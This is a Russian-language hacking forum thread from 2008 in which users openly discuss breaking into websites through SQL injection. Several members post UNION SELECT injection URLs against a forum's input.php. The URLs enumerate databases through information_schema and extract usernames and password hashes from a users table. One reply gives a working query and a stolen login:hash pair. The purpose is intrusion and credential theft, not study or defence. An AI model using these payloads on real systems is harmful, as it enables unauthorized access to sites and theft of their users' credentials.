 |
|
11.12.2008, 16:20
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
С нами:
9277754
Репутация:
0
|
|
2 159932, спасибо
|
|
|
13.12.2008, 02:31
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
Подскажите, я несколько раз, ломая сайт через SQL-инъекцию, наталкивался на админку, авторизация в которой выглядит как системное сообщение (поверх окна, наверняка многие с этим сталкивались..) с полями Имя пользователя и Пароль. Почему то ни в одном случае не получалочь войти в админку, несмотря на то, что логин и пароль введены верно: после ввода появляется ошибка Authorization Required. Во всех остальных случаях авторизация проходит нормально, такая проблема только с подобным видом авторизации. Почему такое может происходить? Вход в админку возможен только с определенного IP? Или что то другое..?
|
|
|
|
13.12.2008, 02:47
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами:
10533245
Репутация:
773
|
|
эти пароли хоаняться в файле htpasswd ....
|
|
|
|
13.12.2008, 03:05
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
То есть при уязвимости в SQL с такой авторизацией получается я никак пассы не достану..? :/ Странно, а зачем же тогда поле Passwd в таблице пользователей сайта..
и еще вопрос: нашел скулю вида:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--%20%201
Хочу соответственно узнать логин и пасс юзеров, ввожу:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+c_users--%20%201
И мне видается ошибка Table 'siteru.c_users' doesn't exist
То есть такой таблицы не существует? Но я же точно знаю, что она есть... и все названия таблиц и колонок правельные! 
Последний раз редактировалось Thrasher88; 13.12.2008 в 03:09..
|
|
|
|
13.12.2008, 03:06
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
С нами:
9230726
Репутация:
242
|
|
эти пароли хоаняться в файле htpasswd ....
не факт, по крайней мере с Apache.
вот почитайте
http://www.softtime.ru/article/index.php?id_article=27
Последний раз редактировалось preda1or; 13.12.2008 в 03:08..
|
|
|
|
13.12.2008, 04:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Thrasher88, проблема в ДБ, в которой находится нужная таблица. Узнавай шема наим!
|
|
|
|
13.12.2008, 11:37
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
правильно ли я делаю? Ввел:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables--%20%201
Появилось, я так понимаю, это самое schema name, попробовал с этим названием:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+worldsru.c_reg_users--%20%201
Все равно пишет, что Table 'worldsru.c_reg_users' doesn't exist Попробовал поперебирать через LIMIT - всего 2 имени - собственно само information_schema и это worldsru ((
|
|
|
|
13.12.2008, 13:16
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Ты не указал, у какой таблицы хочешь узнать table_schema, чтобы узнать нужную, выполни запрос
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.tables+where+table_name='c_reg_users'--%20%201
|
|
|
|
13.12.2008, 14:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Thrasher88
Вот рабочий запрос:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+aphorism.c_reg_users/*
база: aphorism
nazar:4afd521d77158e02aed37e2274b90c9c
А вот все базы их там 10 шт:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,schema_name,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+information_sch ema.schemata+limit+9,1/*
|
|
|
|
13.12.2008, 14:28
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами:
9463474
Репутация:
155
|
|
как можно узнать полный путь к корню сайта?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
